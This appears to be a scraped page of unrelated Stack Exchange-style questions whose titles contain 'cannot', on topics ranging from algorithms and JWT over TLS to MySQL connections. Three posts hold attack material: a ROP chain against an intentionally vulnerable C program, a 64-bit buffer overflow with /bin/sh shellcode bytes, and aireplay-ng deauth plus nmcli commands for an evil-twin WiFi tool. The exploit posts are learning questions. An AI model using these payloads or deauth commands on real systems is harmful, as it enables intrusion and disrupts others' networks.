Matching two sets when you cannot do within-set comparisons

Suppose you have two lists, A and B, each with length n. The elements of A cannot be compared with other elements of A–there is no order relation among them–and likewise for B. However, elements of A can be compared with elements of B. So for instance, suppose we have a function compareTo(a,b) where a is an element of A and b is an element of B. If a is less than b it returns -1, if they’re equivalent it returns 0, and if a is greater it returns 1.

Further suppose that a perfect matching exists between the elements of A and B, in the sense that for every element of A there is precisely one element of B such that compareTo(a,b) evaluates to 0. And vice versa (for each b there is precisely one a such that they’re equivalent).

How do we write an efficient algorithm to find the perfect matching?


My attempts: Well, there’s the naive algorithm which takes an element of A and finds its corresponding element of B, repeating until all matchings have been found. This runs in O(n^2) so we want to beat this.

It sounds kind of like Gale-Shapley but an input to that algorithm is a preference list. In this setting we have ties, where preference lists don’t. And even generating something like a preference list would take n^2 time. Since it is fundamental to Gale-Shapley that members of one set propose to their highest preferences of the other, this doesn’t seem applicable to the given problem.

We could try to use an element of A to partition the set B and try to divide-and-conquer. But you would only have divided B and wouldn’t know which elements of A to give to the recursive call. You could then try to use B to partition A. To describe this more, let’s give a specific example. Suppose A = [a1,a2,a3,a4] and B = [b4,b1,b3,b2] and suppose that ai < bj if i < j, and likewise for = and >. We could arbitrarily select a1 and then use it to partition B into the elements that come out greater in the comparison, [b4,b3,b2] and the elements that come out smaller []. Since along the we way we found that a1 matched b1 we make that assignment and eliminate them from the rest of the algorithm. Now that we know a1 was quivalent to b1 we can use b1 to partition A into [] and [a2,a3,a4]. We recursively call the algorithm on the smaller sets [], [] which satisfies the conditions: they have the same length and have perfect matching. And recursively call the algorithm on the larger sets [a2,a3,a4], [b4,b3,b2] which also have the same length and have a perfect matching.

I think this algorithm is correct, but in the worst case it doesn’t beat the worst-case runtime of the naive algorithm. So I don’t think I’m on the right track here.

Is there a reason why JWT cannot be used as “connection bound context variable” for TLS?

Apart from the fact that TLS doesn’t have “connection context” variables, is there any reason why this couldn’t be technically built into the standard for something like JWT?

Why it is needed

When a browser sends multiple requests to the same API server, it resends the JWT in the header multiple times. This means additional data overhead, and each time, the server needs to verify the JWT.

I would like to see the TLS standard include “connection bound context variables” so that JWTs can be sent once and used across multiple HTTP REQUESTS over that TLS connection.

How it could work

1) The client connects to the server, and a TLS encrypted session is established.

2) The client send the JWT to the server-side – there are two options for this:

A) The client can send connection variables directly on the TLS layer. The client sets the variable on the client side, and TLS sends the data to the server side. The variable name from the client is always prefixed with “CLIENT-“.

B) The client sends a HTTP request over the TLS session to a specific endpoint dedicated for use to set a TLS variable /api/setJWT. The client sends the JWT as a POST. The server reads the JWT, verifies it, and then sets it to the TLS connection context.

[B] would work best, because client software would be harder to change (browsers).

3)

On the serverside, the encapsulating TLS object’s ITLSConnectionContext interface is made available from HTTP REQUEST handlers. The ITLSConnectionContext has three functions, string[] ListVariables(), string GetVariable(name), SetVariable(name, string).

Assuming 2B is used, when GetVariable(“JWT”) is successful, it can be assumed that it’s valid.

How it could work without changing TLS standard

If a particular TLS connection between the server and the client has a secure identity, then the application-layer can link that to a simple dictionary lookup. Perhaps this could be a GUID (as well as the client-side IPAddress-Port tuple). This GUID approach would mean each language framework can natively implement the lookup, and that makes other benefits possible, where native memory objects can also be linked, not just platform-independent strings.

Other benefits

Furthermore, the server might variables on the context for other purposes:

1) A database PK for the Person behind the JWT, PersonID. It might be a stream interface 2) A particular stream (TCP connection) to another resource 3) A file lock to a user-related logging file

The web would be better.


But am I wrong? Am I missing something that would make this unworkable and insecure?

Cannot submit valid form in FormFunction

I have a simple FormFunction like this:

FormFunction[{"expr" -> ToExpression}, HTTPRequestData[] &] 

When I use CloudDeploy, it works as normal. But when I use SocketListen and GenerateHTTPResponse to establish a server, my Chrome seems have submitted no data as I can’t Find it in the results of HTTPRequestData.

I’ve tried remote server(instead of local), #expr(instead of HTTPRequestData), none of them works. If I use APIFunction as the backend and URLRead as the client, everything is OK.

What’s missing for the submission compared to the WolframCloud one?

What is the most unique data identifier for a phone user that cannot be repeated?

I’m currently developing an android (and probably iOS in the future) application for my company.

I was wondering what is the most unique data identifier to authenticate the users. A data that cannot be repeated through users.

For example:

Email? That user can log in with another phone using the email and password

Phone number? Could be the most unique one but it would required to verify the phone and I will have to setup a SMS validation service like WhatsApp

IMEI? It pretty much validates the unique phone but it can be spoofed or replaced. Although I don’t know if the application required permissions for this.

EDIT: Maybe a mix of all this methods?

My main goal is to save this data as a database and make it the primary key of it and with this know exactly who’s the user that it’s really using the company web services.

I hope you guys can help me.

Thank you.

Cannot build a ROP chain

My ROP exploit crashes with segmentation fault for unknown reason. This is a vulnerable code (compiled via command gcc h2.c -no-pie -fno-stack-protector -m32 -o h2):

#include <stdio.h> #include <string.h> #include <stdlib.h>  char string[100]; void exec_string() {     system(string); }  void add_bin(int magic) {     if (magic == 0xdeadbeef) {         strcat(string, "/bin");     } }  void add_sh(int magic1, int magic2) {     if (magic1 == 0xcafebabe && magic2 == 0x0badf00d) {         strcat(string, "/sh");     } }  void vulnerable_function(char* string) {     char buffer[100];     strcpy(buffer, string); }  int main(int argc, char** argv) {     string[0] = 0;     vulnerable_function(argv[1]);     return 0; } 

I followed this example: https://medium.com/@nikhilh20/return-oriented-programming-rop-chaining-def0677923ad

In addition, there are no suitable gadgets of pop pop ret pattern (actually, there are, but pop [some reg] pop ebp ret, which messes up the stack as well as gadgets with leave instruction).

I’ve tried two different stack paddings for an exploit: the first one is identical to the primer in the link I provided above. The second one is (top – higher addresses, bottom – lower addresses):

address of exec_string garbage value 0x0badf00d 0xcafebabe add esp 8; pop ebx; ret <-- gadget address of add_sh 0xdeadbeef pop; ret gadget <-- gadget address of add_bin <-- compromised instruction pointer after BoF AAAA .... 112 'A's to overflow the buffer and overwrite ebp (108 + 4) .... AAAA 

Let me explain the add esp, 8; pop ebx; ret gadget. There are no gadgets like pop [some reg]; pop [some reg, not ebp]; ret for chaining calls from add_sh to exec_string functions, so I’ve tried to make a little hack. I’ve chosen add esp, 8; pop ebx; ret gadget to pop out 0xcafebabe and 0x0badf00d via add esp,8 then pop out garbage unreferenced value via pop ebx and then ret to exec_string. Does it suppose to work at all? Correct me if I wrong.

Moreover, when I’ve started debugging, it results with:

Cool, it looks like I owned an instruction pointer, I need to replace it with add_bin function address to jump to it and start a ROP chain.

But…

SIGSEGV in 0x91c2b1c2? I’ve entered a correct add_bin address, ASLR, PIE and canaries are disabled. I thought that maybe there is an undefined reference to string that vulnerable_function gets, but in primer in the link provided above it was ignored, so it confused me a lot.

Proof strategy to show that an algorithm cannot be implemented using just hereditarily terminating procedures

I am taking my question here from there. Consider the following scenario:

You are given a fixed programming language with no nonlocal control flow constructs. In particular, the language does not have

  • Exceptions, first-class continuations, etc.
  • Assertions, in the sense of “runtime tests that crash the program if they fail”.

Remark: An example of such a language could be Standard ML, minus the ability to raise exceptions. Inexhaustive pattern matching implicitly raises the Match exception, so it is also ruled out.

Moreover, you are forced to program using only hereditarily terminating values. Inductively, we define hereditarily terminating values as follows:

  • Data constructors (including numeric and string literals) are hereditarily terminating.
  • Applications of data constructors to hereditarily terminating arguments are hereditarily terminating.
  • A procedure f : foo -> bar is hereditarily terminating if, for every hereditarily terminating x : foo, evaluating the expression f x always terminates and the final result is a hereditarily terminating value of type bar.

Remarks:

  • Hereditarily terminating procedures need not be pure. In particular, they may read from or write to a mutable store.

  • A procedure is more than just the function it computes. In particular, functions do not have an intrinsic asymptotic time or space complexity, but procedures do.


Hereditarily terminating procedures formalize my intuitive idea of “program that is amenable to local reasoning”. Thus, I am interested in what useful programs one can write using only hereditarily terminating procedures. At the most basic level, programs are built out of algorithms, so I want to investigate what algorithms are expressible using only hereditarily terminating procedures.

Unfortunately, I have hit an expressiveness ceiling much earlier than I expected. No matter how hard I tried, I could not implement Tarjan’s algorithm for finding the strongly connected components of a directed graph.

Recall that Tarjan’s algorithm performs a depth-first search of the graph. In addition to the usual depth-first search stack, the algorithm uses an auxiliary stack to store the nodes whose strongly connected components have not been completely explored yet. Eventually, every node in the current strongly connected component will be explored, and we will have to pop them from the auxiliary stack. This is the step I am having trouble with: The loop that pops the nodes from the stack terminates when a given reference node has been found. But, as far as the type checker can tell, the reference node could not be in the stack at all! This results in an extra control flow path in which the stack is empty after popping everything from it and still not finding the reference node. At this point, the only thing the algorithm can do is fail.

This leads to the following…

Conjecture: Tarjan’s algorithm cannot be implemented in Standard ML using only hereditarily terminating procedures.

My questions are:

  1. What kind of proof techniques would be necessary to prove the above conjecture?

  2. What is the bare minimum type system in which Tarjan’s algorithm can be expressed as a hereditarily terminating program? That is, what is the bare minimum type system that can “understand” that the auxiliary stack is guaranteed to contain the reference node, and thus will not add a control flow path in which the auxiliary stack is empty before the reference node has been found?


Final remark: It is possible to rewrite this program inside a partiality monad. Then every procedure would be a Kleisli arrow. Instead of

val tarjan : graph -> scc list 

we would have something like

val tarjan : graph -> scc list option 

But, obviously, this defeats the point of the exercise, which is precisely to take out the procedure out of the implicit partiality monad present in most programming languages. So this does not count as a solution.

Google Search console cannot fetch my sitemap. How to force Google to index a site?

I am working on a project that just rebranded.

Using Google Search Console I am getting some weird errors. Despite my sitemap_index.xml and robot.txt working properly, google cannot seem to fetch it for some reason.

my sitemap is here: https://example.com/sitemap_index.xml

and my robot.txt: https://example.com/robot.txt

When I try to get my site referenced on google this is what I get: enter image description here enter image description here

If I click on Open sitemaps it opens just fine.

This is what google is saying on my url inspection: enter image description here

I tried reindexing multiple times but nothing changed.

The site has been live for over a month now and is still not referenced despite having backlinks pointing to it from linked in and more.

Where can this be coming from? I asked Google support but no luck and asked my DNS provider to double check everything but it seems fine. I’ve also hired a DevOps to check my server configuration but apparently everything is fine.

64bit buffer overflow fails with SIGILL, cannot understand the reason

I have been doing 32bit buffer overflows for some time and I decided to try some 64bit overflows, to explore some more realistic scenarios. I have compiled my code with gcc -fno-stack-protector -z execstack -no-pie overflow.c -o Overflow.

Here is the code:

#include <stdio.h> #include <string.h> void function(char *str) {     char buffer[32];     strcpy(buffer,str);     puts(buffer); }  int main(int argc, char **argv) {     function(argv[1]); } 

Using gdb I determined how many bytes I need to write to control the return address. This is 40 bytes. So at first I tried to write 40bytes of “A” and then 6bytes of “B” to test the control of the return address.

Here is a screenshot: enter image description here

I found and tested a 23 byte shellcode that executes “/bin/sh”, so I try to write a nop-sled of 13 bytes, the shellcode and the first 6 bytes of the return address that need to change. So I come up with this (in gdb):

r $  (python -c'print "\x90"*13+"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"+"\x10\xe1\xff\xff\xff\x7f"') 

I have set 2 breakpoints before and after the execution of strcpy and examine the memory.

This is the stack before the strcpy: enter image description here

where at address 0x00007fffffffe138 is the return address of function function enter image description here

And this is the stack right after the strcpy execution: enter image description here

So in my understanding, after I press c to continue the execution, I must “return” to the nopsled and then execute the shellcode in gdb.

Instead I get a SIGILL, for illegal instruction.

enter image description here

I cannot figure out why this is happening, any help/suggestions/pointer would be much appreciated.

Cannot connect web app to MySQL database

I’m not sure what I’m doing wrong. You can see in the bottom right corner that it says it cannot connect to the database. You can see MySQL Workbench open with the database created called smartertrack. I also included the error log for the SmarterTrack app, which says the connection string has not been initialized, but I don’t know what that means. The root password is correct, I have tested it over and over.

Screenshot

Cannot Start WiFi Hotspot while Deauth is Running

I am currently building a WiFi hacking tool, I am stuck at a part where I will deauth all clients on an AP while maintaining my fake AP turned on

I am using aireplay-ng to deauth

aireplay-ng --deauth 0 -c '$  device' -a '$  bssid' '$  suc 

And to create the fake AP

nmcli connection add type wifi ifname '*' con-name $  ssid autoconnect yes ssid $  ssid; nmcli connection modify $  ssid 802-11-wireless.mode ap 802-11-wireless.band bg ipv4.method shared; nmcli connection up $  ssid;